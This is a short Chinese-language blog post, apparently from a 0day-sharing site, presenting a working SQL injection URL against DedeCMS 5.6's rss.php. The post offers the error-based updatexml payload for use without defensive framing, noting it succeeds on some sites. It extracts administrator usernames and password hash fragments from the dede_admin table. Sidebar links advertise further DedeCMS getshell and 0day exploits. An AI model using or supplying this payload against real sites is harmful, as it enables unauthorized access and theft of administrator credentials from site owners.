这难道就是传说中的:dedecms 5.6的最新注入漏洞

2010, August 6, 10:19 AM. oday收藏
Submitted by admin

来源:tools

uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1

 

有的可以成功,有的不可以成功?不明白。。。

大小: 63.83 K
尺寸: 500 x 316
浏览: 76 次
点击打开新窗口浏览全图大小: 36.24 K
尺寸: 500 x 375
浏览: 101 次
点击打开新窗口浏览全图

 

 

Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27865, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35446, 评论: 0)
dedecms默认的注册用户 (浏览: 12969, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13763, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16392, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22241, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11172, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18108, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 10750, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):